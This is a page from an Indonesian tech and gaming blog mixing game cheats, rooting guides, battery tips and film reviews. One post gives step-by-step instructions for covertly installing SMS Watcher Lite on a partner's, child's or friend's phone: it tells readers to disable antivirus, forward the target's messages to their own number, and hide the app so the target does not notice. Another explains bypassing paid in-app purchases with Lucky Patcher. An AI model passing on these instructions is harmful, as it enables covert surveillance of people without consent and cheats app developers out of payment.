Save Editor Untuk Dynasty Warrior 6

Kali ini ane mau share save editor untuk Dynasty Warrior 6.

Yap save editor ini sangat berguna untuk sobat yang ingin cepat menjadi kuat :v.
Cara menggunakan cukup gampang

 sobat cuman perlu milih character yang ada seperti ini.

dan sobat bisa mengganti stats sesuka sobat sendiri jadi tak perlu susah-susah naikin lvl 
yang mempermudah sobat dalam bermain
Link Download : Save Editor

Sekian dari ane orang tamvan, Salam Sobat Figmalogy :v
READ MORE - Save Editor Untuk Dynasty Warrior 6

Cara Menggunakan Game Killer Dan Link Download

Untuk anda pengguna gadget android, Anda sangat senang dengan aplikasi game yang anda mainkan, tetepi anda masih belum bisa cara penggunaan game killer yang fungsinya mirip dengan cheat engine untuk game dikomputer,..Kali ini ane telah membuat tutorial tentang Cara menggunakan game killer android yang mirip Cheat Engine Untuk Game android yang dapat anda baca selengkapnya dibawah ini
READ MORE - Cara Menggunakan Game Killer Dan Link Download

TIPS MENGHEMAT BATTERY UNTUK ANDROID











TIPS MENGHEMAT BATTERY UNTUK ANDROID - Selamat datang kembali pada blog figmalogy. Terima kasih bagi sobat sobat figmalogy yang selalu ada pada blog ini, meluangkan waktu untuk membaca artikel kami. Pada kali ini saya akan membahas tentang Tips Menghemat Battery Untuk Android. 

Android-Users pasti sering kan merasakan bahwa android sobat terasa cepat habis batterynya? kadang sobat juga kesal saat battery sobat low, karena saat itu sobat sangat membutuhkan Hp sobat dalam hal  yang sangat genting. Saya juga merasakan hal yang sama. Karena kita memiliki masalah yang sama, mari saya akan memberikan tips untuk menghemat battery android sobat! 

Tips Menghemat Battery Untuk Android

  1. Biasakan untuk menghabiskan isi battery gadget sobat kemudian lakukan pengisian ulang sampai keadaan battery sobat minimal 80% atau sampai maksimal.
  2. Matikan wifi / Bluetooth / GPS jika tidak digunakan. Kontrol pula intensitas layar gadget sobat, yang pastinya paling banyak memakan daya baterai.
  3. Stabilitas jaringan provider agan (2G/3G). Pilih option “2G Networks Only” untuk mengaktifkan jaringan 2G. Kualitas jaringan 3G di Indonesia masih belum stabil, maka lebih baik di set 2G only saja. Perubahan dr 3G ke 2G atau sebaliknya, itulah yg membuat konsumsi daya lbh banyak, sehingga bateray menjadi lbh boros. Saya rasa hanya untuk SMS/telepon/Browsing Internet tidak perlu sampai menggunakan 3G.
  4. Uninstall Aplikasi yang tidak berguna. Selain bertujuan untuk membebaskan memori gadget, aplikasi tidak penting itu hanya akan menabah beban battery Android gadget sobat. Ada satu aplikasi menarik bernama AtrackDog yang digunakan untuk mencari aplikasi yang tidak anda gunakan dan meminta konfirmasi penghapusan.
  5. Setting manual untuk mematikan koneksi sinkronisasi pada Android gadget. Masuk ke menu Settings > Accounts & Sync > Uncheck Back ground data. Hal ini sangat dianjurkan dalam menghemat battery dengan mengagalkan sambungan langsung data yang secara otomatis tersinkronisasi dalam Google Service.
  6. Animasi. Adanya animasi memang mempercantik tampilan ponsel kita, namun akan menyebabkan battery lebih cepat habis, karena itu jika ingin battery lebih awet ada baiknya kita hilangnya animasi, adapun caranya dengan memilih Pengaturan > Tampilan > Animasi > Tidak ada animasi
  7. Wallpaper animasi (live wallpaper). Sama halnya seperti animasi, wallpaper animasi (live wallpaper) juga dengan cepat membuat battery lebih cepat habis, gunakan tampilan latar belakang yang berwarna hitam polos. Dengan menampilkan latar latar belakang gelap atau tidak terang akan menghemat baterai dibandingkan layar warna-warni atau menggunakan wallpaper hasil foto selfie, karena tidak banyak energi yang digunakan saat menggunakan layar berwarna hitam polos.
  8. Matikan widget dan icon. Widget akan online secara otomatis sedangkan icon akan memperberat kinerja ponsel sehingga battery pun akan lebih cepat habis.
  9. Automatic update. Menu ini biasanya digunakan untuk update jika ada notifikasi terbaru, contoh yang menggunakan menu ini adalah facebook, twitter dll. Matikan fitur ini untuk memperpanjang battery.
  10. Sinyal lemah. Jika kondisi sinyal lemah, handphone akan berusaha untuk mencari sinyal, terkadang handphone sampai hangat gara-gara sinyal yang sangat lemah. Jika dalam kondisi seperti ini sebaiknya menggunakan opsi flight mode.
  11. Cara charger. Sebulan sekali, sebaiknya kita membiarkan handphone kita sampai kondisi 0 dan kemudian charging dalam kondisi mati hingga 100%, cara ini cukup membantu untuk memperlama penggunaan battery
  12. Matikan fitur online. Sebenarnya cara ini tidak dianjurkan, tapi jika anda sangat jarang untuk online dan lebih membutuhkan daya tahan battery yang prima anda bisa memilih cara ini, pengalaman penulis menggunakan handphone galaxy young jika mematikan fitur online handphone dapat bertahan hingga hampir 1 minggu sedangkan jika online hampir 2 hari (kondisi handphone jarang dipakai). Caranya pilih Pengaturan > Nirkabel dan Jaringan > Jaringan seluler > Hapus centang pada Gunakan data paket.
  13. Aktifkan Mode Battery Saver. Ini juga salah satu tips yang paling gampang kalau kamu belum paham betul cara mengoperasikan hape android, caranya cukup tarik pintasan yang biasa ada diatas layar, lalu nyalakan fitur baterry saver, dengan cara ini umumnya hape android anda akan dapat bertahan dalam tempo yang sangat lama.
  14. Menonaktifkan suara keyboard. Percaya atau tidak, suara keyboard android mengkonsumsi energi baterai. Anda dapat dengan mudah menemukan cara menonaktifkan suara ini pada pengaturan keyboard. Bila masih bingung silahkan baca di buku panduannya.

Sekian tips dari saya, semoga bermanfaat bagi sobat figmalogy. Jangan lupa untuk selalu merawat kondisi android kita. Bagaimanapun android kita adalah hampir sebagian dari kehidupan kita karena dijaman yang maju ini kita tak akan lepas dari yang namanya HP.


READ MORE - TIPS MENGHEMAT BATTERY UNTUK ANDROID

CARA HACK IN-APP PURCHASEA ANDROID

Cara hack In-App Purchases (pembelian dalam aplikasi) yang digunakan pada setiap game dan aplikasi Android kini tidaklah sulit. Dengan hack In-App Purchase menggunakan Lucky Patcher ini, kamu dapat membeli seluruh barang-barang Premium secara gratis tanpa memerlukan kartu kredit.
Untuk cara menggunakan Lucky Patcher tidaklah sulit. Pastikan kamu sudah root Android kamu, karena aplikasi ini membutuhkan akses ke sistem saat digunakan.


.Download Lucky patcher di sini click here .


  • Buka Lucky Patcher-nya, pilih game atau aplikasi Android yang ingin kamu hack.
  • Pastikan di aplikasi atau game Android yang kamu pilih terdapat keterangan In-App purchases found.
  • Klik game atau aplikasinya lalu pilih menu Open Menu of Patches lalu pilih Support patch for InApp and LVL emulation.



    • Ceklis Support patch for LVL emulation dan Support patch for InApp emulation lalu klik Apply.

      PERBESAR
      PERKECIL
    • Tunggu sebentar hingga prosesnya selesai. Saat sudah selesai, akan muncul hasil patch-nya. Klik Launch agar game atau aplikasinya langsung bisa dijalankan.
    • Jika berhasil, secara otomatis jumlah harga yang ada di storeberubah menjadi $0.00 alias gratis.

      PERBESAR
      PERKECIL
    • Pilih salah satu benda yang ingin kamu beli dengan gratis. Saat muncul jendela baru, ceklis Send a reply to the application unsigned (this may work for non-root users) dan Save purchase for restore lalu klik tombol Yes.

      PERBESAR
      PERKECIL
    • Berikut adalah contoh keberhasilannya:

      PERBESAR
      PERKECIL
    Perlu kamu ketahui, tidak semua game dan aplikasi Android dapat di-hack dengan Lucky Patcher



READ MORE - CARA HACK IN-APP PURCHASEA ANDROID

The Witcher Wild Hunt is released!! Siapkan dompet anda!!


Halo sobat Figmalogy! Kembali lagi dengan ane yang bakal ngereview game The Witcher 3 Wild Hunt, sequel dari 2 seri sebelumnya ini merupakan game action role playing buatan Projekt Red yang dirilis 19 Mei 2015 untuk Xbox One, PS4, Dan Microsoft Windows.

 



Soal Gameplay, mirip dengan seri-seri The Witcher sebelumnya, yaitu sistem action role playing yang memungkinkan pemain melakukan beladiri dengan sihir, juga ada fitur baru, yaitu indra penyihir, menunggang kuda, berenang, dan menggunakan crossbow, juga ada skill melewati berbagai rintangan seperti di "Assasin Creed"

Projekt red menjamin kalian akan mengabiskan hampir 100 jam untuk menamatkan game ini, 50 jam misi utama dan sisanya misi sampingan, juga ada fitur "Day and Night" yang akan mempengaruhi permainan dengan beberapa musuh yg akan berubah tingkat kekuatannya

Juga ada DLC hairstyle dan janggut yg bisa didapat dan karakter "Ciri", yaitu ahli pedang sekaligus penyihir,akan menjadi playable di game ini

Tapi kalian yang spek PC nya low sepertinya mesti mengupgrade atau membeli PC dengan spek lebih tinggi,karena memerlukan spek sebagai berikut

•Intel CPU: Core i5-2500k 3.3HGZ
 AMD CPU: phenom II x4 940
 Nvidia GPU: Geforce GTX 660
 AMD GPU: Radeon HD 7870
 Ram: 6 GB
 DirectX: DX 11
 OS: Windows 7 64 bit
 Ruang penyimpanan: 40 GB


Sekian review nya,selamat memainkan THE WITCHER 3 sobat Figmalogy!
READ MORE - The Witcher Wild Hunt is released!! Siapkan dompet anda!!

CARA UNROOT ANDROID DENGAN MUDAH


Di artikel sebelumnya kita telah membahas cara ngeroot android, tentu saja jika android kamu telah di root ada dampaknya.Dengan root, kamu bisa melakukan banyak hal yang tidak bisa dilakukan oleh Android yang belum di Root seperti Tambah Ram dengan Greenify atau masih banyak lagi. Untuk sebagian smartphone, dengan melakukan root akan menyebabkan garansi smartphone tersebut hilang. Jangan khawatir, jika Android kamu sudah di Root namun kamu tidak tahu cara mengembalikannya seperti semula. Kamu bisa gunakan cara ini.

1.Buka SuperSU/Super User yang sudah terinstall di Android kamu

2.Lalu cari pilihan Full unroot.



3.Akan muncul notifikasi konfirmasi. Jika kamu sudah yakin, pilih Continue.



Tunggu sebentar hingga semua proses selesai. Jika Unroot berhasil, smartphone Android akan melakukan Restart dengan sendirinya.Jika kamu masih ragu untuk melakukannya lebih baik di unroot di servis center.
READ MORE - CARA UNROOT ANDROID DENGAN MUDAH

Review Naruto The Last Movie: Akhir dari kisah naruto



Halo sobat Figmalogy! Ketemu lagi dengan ane, kali ini ane akan mereview tentang film Naruto the last, film terakhir serial Naruto movie, meskipun tidak ada di seluruh bioskop Indonesia, beruntung di kota ane ada nih, hehehe, walaupun waktu tayangnya gak lama, langsung aja reviewnya dibawah gan


Story (SPOILER ALERT!)

Setelah perang dunia ke-4 dunia shinobi, keturunan saudara Rikudo Sennin yang bernama Toneri Ootsuki dari klan hamura, berniat memecah bulan menjadi asteroid untuk menghancurkan bumi menggunakan mata tenseigan, namun dia membutuhkan byakugan untuk melakukan rencananya, Naruto, Shikamaru, Sakura, Sai, Hinata pun dikirim untuk mencegah rencana Toneri, ditengah perjalanan, Toneri pun menikung Hinata dari Naruto dan membawanya ke kastilnya untuk menikah dengannya, Naruto pun patah hati, Tetapi Sakura menyemangatinya, lalu dengan semangat ia dan tim-nya menyerbu kastil Toneri, ia pun berhasil merebut kembali Hinata, Toneri yang marah pun menyerang naruto, pertarungan di bulan pun tidak terhindarkan, sampai-sampai Kurama pun ikut turun tangan dalam pertarungan, sementara itu Raikage dan Bee bersiap menghancurkan bulan dari bumi, Akhirnya Naruto pun menang, dan memutuskan untuk menikah dengan hinata.

+Plus
• cerita dan Visual yang bagus
• aksi pertarungan kurama dan monster toneri di bulan
• akhir kisah Naruto dan Hinata

-Minus
• pertarungan tidak sedahsyat saat melawan Kaguya Ootsuki saat perang dunia ninja
• tidak ada aksi ninja senior seperti kakashi dll.
• tidak ada kisah sasuke dan sakura,dan juga saat sasuke menggunakan sharingan dan rinnegan yang digabung



Sekian dari ane review Naruto the last-nya, see you next time sobat Figmalogy!
READ MORE - Review Naruto The Last Movie: Akhir dari kisah naruto

CARA MELIHAT SMS YANG MASUK KE ANDROID PACAR ATAU TEMAN

Anda pasti ingin tahu apa yang sedang di SMS oleh teman dan pacar anda.Sekarang saya akan memberi tahu anda bagaimana cara melihat SMS yang dikirim ke hp teman ,anaka, atau pacar anda

berikut langkah-langkah nya:
Unduh dulu SMS Watcher Lite di sini→DI SINI
(Sebelum menginstall aplikasinya anda harus mematikan antivirus diandroid anda tapi tenang saja file ini bebas virus kok)


1.Jalankan aplikasi tersebut. Pertama aplikasi tersebut akan meminta password, isikan password yang dikendaki.




2.Masuk ke menu utama SMS Watcher Lite. Di menu utama ada dua bagian, yaitu white list dan forward list. Pada menu white list diabaikan saja, tuliskan nomor handphone kita di forward list karena aplikasi ini tujuannya memang sebagai forwarder SMS.


3.Save dan Close aplikasi. Supaya anak (target) tidak curiga SMS nya disadap, aplikasi tersebut haruslah disembunyikan secara manual. Caranya, di Android biasanya menggunakan launcher.

4.Caranya masuk kemenu home screen, kemudian pilih prefrences lalu aplication hide. Kemudian checklist aplikasi (SMS Watcher Lite) yang akan dihide (sembunyikan).

Nah sekarang setiap SMS yang dikirim ke android pacar,anak,atau teman anda juga masuk ke hp anda.SILAHKAN MENCOBA !
READ MORE - CARA MELIHAT SMS YANG MASUK KE ANDROID PACAR ATAU TEMAN

Crossbone siap hajar Captain America di Civil war!


Halo agan-agan Figmalogy,ada berita baik nih, setelah tertabrak pesawat di film The Winter Soldier dan mengalami luka bakar, Brock Rumlow (Frank Grillo) siap beraksi sebagai Crossbone dengan kostum khasnya, yaitu dengan tanda silang di armor dada dan topeng bermotif tengkoraknya


Crossbone sendiri merupakan ancaman serius bagi Captain America dan kawan-kawan, dengan penguasaan berbagai macam senjata, kemampuan beladiri kelas atas, dan armor yg sangar, dipastikan Captain America akan kesusahan dalam menghadapi orang yang satu ini


Dalam Civil War versi komik, setelah Captain America pergi ke pengadilan, Crossbone pun membunuhnya, jadi apakah di versi cinema ini Captain America akan terbunuh ditangan Crossbone ?? Lihat saja tahun depan...


Sekian dari ane,see you again sobat Figmalogy!

READ MORE - Crossbone siap hajar Captain America di Civil war!

Pou Mod Apk New Version




Halo gan
Hari ini ane mau share nih game
yak pou game tentang mahluk seperti eek yang harus kita pelihara seperti peliharaan sendiri 
game ini mengajarkan kita untuk merawat peliharaan dengan baik dan game ini sangat menyenangkan untuk  mengisi waktu luang dan menigkatkan mood.

Baik tanpa basa-basi lagi ane akan men-Share link download game : POU MOD APK



Untuk hari ini sekian dari ane, jangan lupa untuk komen dan share sobat figmalogy
Thanks for visiting, See you on another article in figmalogy.blogspot.com




READ MORE - Pou Mod Apk New Version

Review Avengers: Age of Ultron (2015)



Halo gan! kali ini ane bakal ngereview tentang sequel dari film The Avengers (2012),yaitu Avengers Age of Ultron, yg dibintangi Robert Downey Junior, Chris Evans, Chris Hemsworth, bapaknya, Scarlett Johansson, Jeremy Renner, Elizabeth Olsen, Aaron Taylor Johnson, Samuel L. Jackson dan sejumlah aktor aktris lainnya, cek reviewnya dibawah gan:

Story: (SPOILER ALERT)
Berkisah tentang Tony Stark dan Bruce Banner yang mencoba program perdamaian dengan kecerdasan buatan yang disebut ultron tapi berkali kali gagal,sampai pada suatu malam di pesta di avengers tower, program ultron tiba tiba bekerja dan mengatur keinginannya sendiri, dia pun menjelajah internet dan data The Avengers, setelah melihatnya, dia pun memberontak dan kabur dengan mengirim datanya ke internet dan pergi ke Sokovia, dia pun membuat tubuh yg lebih sempurna yg disebut ultron prime, yg berniat menjatuhnya meteor buatan ke bumi, maka dari itu, pahlawan terkuat bumi, Iron Man, Captain America, Thor, Hulk, Black Widow, Hawkeye bertempur melawan ultron dan pasukan sentry dronenya, bukan hanya itu, si kembar Quicksilver dan Scarlet Witch, juga merupakan ancaman bagi avengers, walapun nanti mereka bergabung dengan avengers,bagi ane soal action kita disuguhkan aksi pertempuran dengan CGI yang memukau, soal storyline, lumayan bagus, semua avengers mendapat porsi sama rata ,dan mengungkapkan masa lalu dan masa depan para avengers,dan THE VISION!!

+PLUS
  • Aksi pertempuran Avengers vs Ultron yg bikin 2,5 jam di bioskop betah
  • Cerita yg bagus dan mudah dimengerti
  • Adanya New Avengers
  • oh, favorit pribadi ane: Scarlet Witch alias neng Wanda
-MINUS
  • Bagaimana ultron mendapat tubuh baru tidak diceritakan
  • Beberapa scene dirasa tidak perlu
  • Ada potongan alternate ending yg tidak dimasukan dalam film,yg hanya bisa didapat di DVD originalnya
  • Kematian seseorang...
-OVERALL
  • Action:8.5/10
  • Story:8/10
  • Lain-Lain:-


Sekian dan Terimakasih, see you next time sobat figmalogy


READ MORE - Review Avengers: Age of Ultron (2015)

Tutorial Root Android Menggunakan Framaroot

Tutorial Root Android Menggunakan Framaroot - Hallo sobat figmalogy dalam jumpa waktu kali ini saya akan memberikan tutorial root android anda menggunakan aplikasi Framaroot. Apa itu Root? Apakah dampak Root? Untuk mengetahui lebih jelas sobat dapat baca artikel tentang root. 

Dengan aplikasi Framaroot, kita dapat me-Root Hp tanpa menggunakan PC dan tidak perlu ribet-ribet. Seperti biasa, tanpa basa-basi panjang lebar, saya akan memberikan "Tutorial  Root Android Menggunakan Framaroot" 


TUTORIAL ROOT ANDROID MENGGUNAKAN FRAMAROOT

Hal yang perlu dibutuhkan adalah : 
1. Framaroot Apk (Untuk download klik disini!)
2. Keyakinan dan kesabaran saat Root.

Tahapan-Tahapan Root : 

1. Buka Framaroot. Untuk memulai proses rooting Android, pilih pada pilihan yang tersedia yakni “Instal SuperSu”.


2. Setelah itu, pilih metode eksekusi. Pilih “Aragon” atau “Gandalf”. Ini tentunya sesuai dengan kompatibilitas gadget kamu. Misal muncul peringatan, coba pilih metode yang lain mulai prosesnya dari awal , Buka Framaroot.



3. Jika sudah benar, tunggu hingga proses root selesai dan muncul notifikasi sukses dilayar. Setelah itu matikan dan hidupkan ulang android kamu (Restart)

.
4. Setelah android kamu hidup, sekarang coba buka menu di gadget kamu. Jika muncul aplikasi SuperUser, ini menandakan android kamu sudah sukses di root. 






HP apa saja yang dapat di root menggunakan Framaroot? Sebenarnya semua jenis HP dapat diroot, tetapi untuk memastikan silahkan sobat cek di forum apakah HP sobat terdaftar dalam smarthphone android yang didukung Framaroot. Sekian Tutorial Root Android Menggunakan Framaroot. Semoga menjadi manfaat bagi Sobat Figmalogy. 


Baik, sepertinya cukup sudah Tutorial Root Android Menggunakan Framaroot Apk kali ini. Selamat tinggal dan sampai jumpa Sobat Figmalogy^^
READ MORE - Tutorial Root Android Menggunakan Framaroot

Pengertian Fungsi Dan Dampak Root

Untuk saat ini saya akan menjelaskan apa yang dimaksud dengan root. Apa itu root? Apa fungsi dari root? Apakah ada dampak negatif pada android bila kita meroot android? Nah, untuk itu saya akan menjelaskan satu persatu dari pertanyaan tersebut.


PENGERTIAN ROOT


Root adalah suatu system account yang memiliki kekuasaan absolut untuk mengakses dan mengeksekusi semua file, command, system, dalam sistem operasi berbasis linux. Intinya, root ini punya akses tanpa batas yang bisa mengubah, menghapus, menambah, bahkan merusak semua yang ada didalam sistem handphone kita. Nge-root artinya nge-hack sistem handphone supaya kita (pemilik dan pengguna hape) punya akses ke account root tersebut,jadi kitalah yang punya kekuasaan.

FUNGSI ROOT


Sebenarnya ada banyak sekali fungsi dari Root sendiri. Dengan Root kita dapat memanfaatkan Full Akses Android kita. Bila kita memiliki memory internal android yang kecil, kita bisa juga menambahkan menggunakan memory eksternal dan juga kita bisa move data ke Micro SD kita. Untuk mengetahui tutorial root klik disini.

Kelebihan dari Root Android - theme yang bisa diubah-ubah tergantung mood. Untuk anda yang mudah bosan, penggantian variasi themes yang baru bisa jadi pengalaman seru, walau sebenarnya theme itu sendiri sudah terakomodasi dengan baik pada aplikasi market yang biasa. Hal lain yang patut diketahui ialah Android ponsel yang sudah di-root masih punya kemampuan menginstal dari market maupun non market, canggih bukan? Beda dengan Iphone jailbreak yang langsung keok saat terhubung ke ITunes, sebab koneksinya kan langsung ke block, kala konek ke ITunes.

DAMPAK NEGATIF ROOT HP ANDROID

Apa saja dampak dari kita Root android? Mari kita bahas satu persatu.

Ponsel berperilaku tidak normal/sering error
Memang me-root Android dapat meningkatkan kinerja ponsel secara maksimal tapi itu jika dipakai dengan benar. Nah, jika tidak? maka ponsel Android Anda akan sering error seperti; ponsel sering mati, nge-hang, sering reboot sendiri bahkan dapat menyebabkan ponsel bootlop. Bootlop adalah masalah pada saat booting dimana ponsel Anda tidak bisa melakukan startup sebelum masuk ke homescreen pada saat kalian menghidupkan ponsel.

Garansi Ponsel Yang Masih Berlaku Akan Hangus/Tidak berlaku lagi
Jika ponsel Android Anda sudah di-root maka garansi yang masih berlaku akan hangus/tidak berlaku lagi seperti yang sudah Saya jelaskan sebelumnya. Hal tersebut berlaku hampir setiap vendor-vendor ponsel Android. Nah, misalkan ponsel Anda mengalami kerusakan hardware atau error maka Anda tidak dapat menggunakan Garansi ponsel Anda.
Dapat Menyebabkan Panas Yang Berlebihan Pada Ponsel (Overheating)
Dengan melakukan rooting Android memang dapat memaksimalkan kinerja CPU pada ponsel Anda. Tetapi jika Ponsel Anda dipakai berlama-lamaan, maka akan meyebabkan panas yang berlebihan atau sering disebut Overheating.
Mudah Terserang Malware
Melakukan rooting pada ponel Android maka kita dapat menginstall aplikasi-aplikasi yang memerlukan akses root. Namun aplikasi yang mengandung virus/malware dapat dengan mudahnya menyerang ponsel Android Anda.
Sebenarnya dengan me-root Android tidak mengalami dampak negatif pada Android kita. Jika digunakan dengan benar akan lebih menguntungkan kita tapi jika tidak digunakan dengan benar dapat menyebabkan ponsel Anda error/rusak.

Terima kasih telah membaca artikel ini. Semoga bermanfaat bagi kita semua. Bagi sobat yang belum mengerti cara me-root Android, silahkan baca disini Tutorial Root Android Menggunakan Framaroot
READ MORE - Pengertian Fungsi Dan Dampak Root

Cara Root Samsung Galaxy Core 2

Samsung Galaxy Core 2 - Hallo kawan-kawan semua, senang sekali dapat berjumpa kembali dalam blog figmalogy. Kali ini saya akan memberikan tutorial untuk menge-root android merek "Samsung Galaxy Core 2". Samsung Galaxy Core 2 adalah generasi ke dua dari samsung galaxy core series yang dikenal sebagai smartphone yang menawarkan fitur – fitur yang lengkap dengan harga yang terjangkau. Terutama smartphone dengan fitur dual simcard dengan spesifikasi yang cukup mumpuni.
Samsung Galaxy Core 2 memiliki spesifikasi yang dilengkapi dengan Layar 4.5″ TFT Capacitive Touchscreen Kamera 5MP,  Autofokus, LED Flash Memori Internal: 4 GB OS Android v4.4 KitKat RAM 768 MB.
Tak Perlu memakan banyak waktu lagi, sekarang saya akan memberikan "Tutorial Root Samsung Galaxy Core 2"



Berikut adalah tutorial Root Samsung Galaxy Core 2 :



  1. Download Update Kinguser-3.4.0.zip (Untuk download klik disini)
  2. Pindahkan file "Update-Kinguser-3.4.0.zip" yang tadi didownload ke External SDcard  (jangan ditaruh didalam folder)
  3. Matikan Hp samsung galaxy core 2 kalian
  4. Masuk ke mode "Recovery" Caranya : Tekan tombol "Volume UP (atas) + Home + Power"(untuk navigasi di recovery mode : tombol up untuk keatas , down untuk kebawah dan tombol off untuk OK )
  5. Lalu pilih "apply update from sdcard" => Lalu cari/pilih file "Update-Kinguser-3.4.0.zip" yang tadi dipindahkan ke external SDCard kalian
  6.  Tunggu proses Root hingga selesai maka android akan reboot/restart otomatis
  7.  Selamat Samsung Galaxy Core 2 Agan dan Aganwati Sudah berhasil di root.


Sekian tutorial dari saya. Semoga menjadi bermanfaat bagi agan dan aganwati. Jangan lupa klik share dan komentar ya^^ Semoga berhasil untuk me-Root Hp kawan yaa..

Apabila terjadi kerusakan itu sudah diluar tanggung jawab saya, usahakan jangan me-root pada   saat hp low dan jangan lupa berdoa agar proses berhasil.


READ MORE - Cara Root Samsung Galaxy Core 2
 
Dunia Film Game Animasi Teknologi

Most Reading

Powered by Blogger.